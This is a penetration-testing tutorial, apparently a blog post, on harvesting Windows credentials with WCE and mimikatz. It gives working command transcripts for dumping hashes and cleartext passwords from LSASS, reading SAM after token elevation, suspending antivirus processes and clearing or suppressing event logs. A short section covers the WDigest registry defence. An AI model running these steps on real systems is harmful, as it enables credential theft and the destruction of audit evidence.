Privilege Escalation in Penetration Testing: Escalating with Credential-Dumping Tools

I. The Windows authentication process

  When an account logs on to a target server/system, the WDigest security package (wdigest.dll, loaded inside the LSASS process) keeps that account's cleartext password in memory for as long as the logon session exists; it is removed only when the account logs off. This is what makes cleartext recovery possible by default on XP/2003/Vista/7/2008. From Windows 8.1/Server 2012 R2 onwards (and on older versions once KB2871997 is installed and UseLogonCredential is set to 0), WDigest no longer caches the cleartext, and only the hashes remain recoverable.

II. WCE (Windows Credential Editor)

  Windows Credentials Editor (WCE) is a powerful internal-network penetration tool for the Windows platform.

Function

  It lists logon sessions and can add, change and delete their associated credentials (for example LM/NT hashes). In an internal-network engagement this is used for pass-the-hash on Windows, and for dumping NT/LM hashes out of memory (from interactive logons, services and remote desktop connections alike) for further attacks. It can show the password of currently logged-on users both in hashed form and, via WDigest, in cleartext.

Requirements

  Administrator privileges on the target (WCE opens LSASS, which needs SeDebugPrivilege).

Installation

apt-get install wce
root@kali:/usr/share/windows-resources/wce# ls
getlsasrvaddr.exe README wce32.exe wce64.exe wce-universal.exe

help

C:\wce>wce-universal.exe -h
WCE v1.41beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by
Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Options:
        -l              List logon sessions and NTLM credentials (default).
        -s              Changes NTLM credentials of current logon session.
                        Parameters: <UserName>:<DomainName>:<LMHash>:<NTHash>.
        -r              Lists logon sessions and NTLM credentials indefinitely.
                        Refreshes every 5 seconds if new sessions are found.
                        Optional: -r<refresh interval>.
        -c              Run <cmd> in a new session with the specified NTLM credentials.
                        Parameters: <cmd>.
        -e              Lists logon sessions NTLM credentials indefinitely.
                        Refreshes every time a logon event occurs.
        -o              saves all output to a file.
                        Parameters: <filename>.
        -i              Specify LUID instead of use current logon session.
                        Parameters: <luid>.
        -d              Delete NTLM credentials from logon session.
                        Parameters: <luid>.
        -a              Use Addresses.
                        Parameters: <addresses>
        -f              Force 'safe mode'.
        -g              Generate LM & NT Hash.
                        Parameters: <password>.
        -K              Dump Kerberos tickets to file (unix & 'windows wce' format)
        -k              Read Kerberos tickets from file and insert into Windowscache
        -w              Dump cleartext passwords stored by the digest authentication package
        -v              verbose output.

Parameters:

  -l : list the current logon sessions with the password hashes of each account [lmhash:nthash]

  -lv: same, with verbose output [note that injection mode may corrupt the LSASS process; -f forces the safer read-only mode]

  -r : re-read periodically (default every 5 s) to catch newly logged-on accounts.

  -d : delete the NTLM credentials of the session identified by the given LUID.

  -g : compute the LM and NT hashes of the given password.

  -w : dump the cleartext passwords that the WDigest security package keeps in memory for logged-on accounts.

Note: wce reads from memory (LSASS); pwdump reads from the SAM database on disk.

Examples

  Copy the whole wce folder to the test machine (XP SP3 here), create several accounts on it, and use "switch user" so that each of them is logged on at the same time.

Parameter -l:

Parameter -lv:

Parameter -r:

Log on as account a

Parameter -d:

Parameter -g:

Parameter -w:

Parameters -i with -s (replace the credentials of a specified session):

For example: replace the credentials of a's logon session with those of the administrator account

III. Defending against WCE

  Because the cleartext password is held in memory by the Digest Authentication Package, which is loaded by default, one mitigation is to remove it from the list of security packages in the registry. This only takes effect after a reboot, and it breaks anything that relies on Digest authentication (for example IIS Digest auth). On Windows 8.1/Server 2012 R2 and later, and on older versions with KB2871997 installed, the supported switch is instead the REG_DWORD value UseLogonCredential under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest: 0 disables cleartext caching, 1 re-enables it. Attackers flip it back to 1, so that value is worth monitoring.

  Registry path: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages

Default entries under Security Packages:

  • kerberos
  • msv1_0
  • schannel
  • wdigest  keeps cleartext passwords in local (LSASS) memory
  • tspkg  Terminal Services (remote desktop) ……
  • pku2u

IV. Similar tools

1. pwdump

  See: https://www.cnblogs.com/z9m8r8/articles/15892054.html

2. fgdump

  Kali path: /usr/share/windows-binaries/fgdump

XP demo:

3. mimikatz

  Kali path: /usr/share/windows-resources/mimikatz

Help (entering :: alone lists the modules; module:: lists that module's commands)

C:\Documents and Settings\Administrator\Desktop\mimikatz\Win32>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x86) #18362 May 13 2019 01:34:39
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # ::
ERROR mimikatz_doLocal ; "" module not found !

        standard  -  Standard module  [Basic commands (does not require module name)]
          crypto  -  Crypto Module
        sekurlsa  -  SekurLSA module  [Some commands to enumerate credentials...]
        kerberos  -  Kerberos package module  []
       privilege  -  Privilege module
         process  -  Process module
         service  -  Service module
         lsadump  -  LsaDump module
              ts  -  Terminal Server module
           event  -  Event module
            misc  -  Miscellaneous module
           token  -  Token manipulation module
           vault  -  Windows Vault/Credential module
     minesweeper  -  MineSweeper module
             net  -
           dpapi  -  DPAPI Module (by API or RAW access)  [Data Protection application programming interface]
       busylight  -  BusyLight Module
          sysenv  -  System Environment Value module
             sid  -  Security Identifiers module
             iis  -  IIS XML Config module
             rpc  -  RPC control of mimikatz
            sr98  -  RF module for SR98 device and T5577 target
             rdm  -  RF module for RDM(830 AL) device
             acr  -  ACR Module

privilege module: request token privileges (privilege::debug asks for SeDebugPrivilege, LUID 20, which is what lets mimikatz open the LSASS process)

mimikatz # privilege::
ERROR mimikatz_doLocal ; "(null)" command of "privilege" module not found !

Module :        privilege
Full name :     Privilege module

           debug  -  Ask debug privilege
          driver  -  Ask load driver privilege
        security  -  Ask security privilege
             tcb  -  Ask tcb privilege
          backup  -  Ask backup privilege
         restore  -  Ask restore privilege
          sysenv  -  Ask system environment privilege
              id  -  Ask a privilege by its id
            name  -  Ask a privilege by its name

mimikatz # privilege::debug   # obtain SeDebugPrivilege
Privilege '20' OK

sekurlsa module: enumerate the credentials of logged-on accounts (hashes, cleartext, tickets)

mimikatz # sekurlsa::
ERROR mimikatz_doLocal ; "(null)" command of "sekurlsa" module not found !

Module :        sekurlsa
Full name :     SekurLSA module
Description :   Some commands to enumerate credentials...

             msv  -  Lists LM & NTLM credentials
         wdigest  -  Lists WDigest credentials
        kerberos  -  Lists Kerberos credentials
           tspkg  -  Lists TsPkg credentials
         livessp  -  Lists LiveSSP credentials
             ssp  -  Lists SSP credentials
  logonPasswords  -  Lists all available providers credentials
         process  -  Switch (or reinit) to LSASS process  context
        minidump  -  Switch (or reinit) to LSASS minidump context
             pth  -  Pass-the-hash
          krbtgt  -  krbtgt!
     dpapisystem  -  DPAPI_SYSTEM secret
         tickets  -  List Kerberos tickets
           ekeys  -  List Kerberos Encryption Keys
           dpapi  -  List Cached MasterKeys
         credman  -  List Credentials Manager

mimikatz # sekurlsa::logonPasswords

Authentication Id : 0 ; 242726 (00000000:0003b426)
Session           : Interactive from 0
User Name         : Administrator
Domain            : DH-CA8822AB9589
Logon Server      : DH-CA8822AB9589
Logon Time        : 2/15/2022 9:14:59 AM
SID               : S-1-5-21-583907252-1757981266-1177238915-500
        msv :
         [00000002] Primary
         * Username : Administrator
         * Domain   : DH-CA8822AB9589
         * LM       : 44efce164ab921caaad3b435b51404ee
         * NTLM     : 32ed87bdb5fdc5e9cba88547376818d4
         * SHA1     : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
        wdigest :
         * Username : Administrator
         * Domain   : DH-CA8822AB9589
         * Password : 123456
        kerberos :
         * Username : Administrator
         * Domain   : DH-CA8822AB9589
         * Password : 123456
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2/15/2022 9:08:41 AM
SID               : S-1-5-19
        msv :
…………………………

process module: process management

mimikatz # process::
ERROR mimikatz_doLocal ; "(null)" command of "process" module not found !

Module :        process
Full name :     Process module

            list  -  List process
         exports  -  List exports
         imports  -  List imports
           start  -  Start a process
            stop  -  Terminate a process
         suspend  -  Suspend a process
          resume  -  Resume a process
             run  -  Run!
            runp  -
mimikatz # process::start cmd
Trying to start "cmd" : OK ! (PID 3888)

service module: service management

mimikatz # service::
ERROR mimikatz_doLocal ; "(null)" command of "service" module not found !

Module :        service
Full name :     Service module

           start  -  Start service
          remove  -  Remove service
            stop  -  Stop service
         suspend  -  Suspend service
          resume  -  Resume service
     preshutdown  -  Preshutdown service
        shutdown  -  Shutdown service
            list  -  List services
               +  -  Install Me!
               -  -  Install Me!
              me  -  Me!

suspend sub-command: suspends a process; used, for example, to pause anti-virus software while a payload is dropped.

resume sub-command: resumes a suspended process.

lsadump module: dump SAM/LSA secrets. Note that the lsadump::sam run below fails with 0x00000005 (access denied) because reading the SAM hive needs SYSTEM, not just Administrator: run token::elevate first, or start mimikatz as SYSTEM (for example with psexec -s), then repeat the command.

mimikatz # lsadump::
ERROR mimikatz_doLocal ; "(null)" command of "lsadump" module not found !

Module :        lsadump
Full name :     LsaDump module

             sam  -  Get the SysKey to decrypt SAM entries (from registry or hives)
         secrets  -  Get the SysKey to decrypt SECRETS entries (from registry or hives)
           cache  -  Get the SysKey to decrypt NL$KM then MSCache(v2) (from registry or hives)
             lsa  -  Ask LSA Server to retrieve SAM/AD entries (normal, patch on the fly or inject)
           trust  -  Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly)
      backupkeys
          rpdata
          dcsync  -  Ask a DC to synchronize an object
        dcshadow  -  They told me I could be anything I wanted, so I became a domain controller
         setntlm  -  Ask a server to set a new password/ntlm for one user
      changentlm  -  Ask a server to set a new password/ntlm for one user
         netsync  -  Ask a DC to send current and previous NTLM hash of DC/SRV/WKS
        packages

mimikatz # lsadump::sam    # read account hashes from the SAM database
Domain : DH-CA8822AB9589
SysKey : 7be839f49edcab29c3a40fe24d47335f
ERROR kull_m_registry_OpenAndQueryWithAlloc ;kull_m_registry_RegOpenKeyEx KO
ERROR kuhl_m_lsadump_getUsersAndSamKey ;kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)

ts module: Terminal Services. By default XP allows only one active logon session.

ts::multirdp patches the Terminal Server service in memory so that several sessions can run in parallel, i.e. multi-user logon.

event module: event log management

mimikatz # event::
ERROR mimikatz_doLocal ; "(null)" command of "event" module not found !

Module :        event
Full name :     Event module

            drop  -  [experimental] patch Events service to avoid new events
           clear  -  Clear an event log

mimikatz # event::clear
Using "Security" event log :
- 0 event(s)
- Cleared !
- 1 event(s)

mimikatz # event::drop

clear: clears an event log that has already been written (the Security log by default). Note the "1 event(s)" after "Cleared !": clearing the Security log immediately writes Event ID 1102 ("the audit log was cleared"), which is exactly what defenders alert on.

drop: experimental; patches the event service so that no new events are recorded.

misc module: miscellaneous commands

token module: token manipulation (token::elevate impersonates a SYSTEM token, which is what lsadump::sam needs)

mimikatz # token::
ERROR mimikatz_doLocal ; "(null)" command of "token" module not found !

Module :        token
Full name :     Token manipulation module

          whoami  -  Display current identity
            list  -  List all tokens of the system
         elevate  -  Impersonate a token
             run  -  Run!
          revert  -  Revert to proces token

mimikatz # token::whoami
 * Process Token : {0;0002ed48} 0 - 333441      DH-CA8822AB9589\Administrator S-1-5-21-583907252-1757981266-1177238915-500    (08g,20p)       Primary
 * Thread Token  : no token


Posted 2022-02-15 01:08 by z9m8r8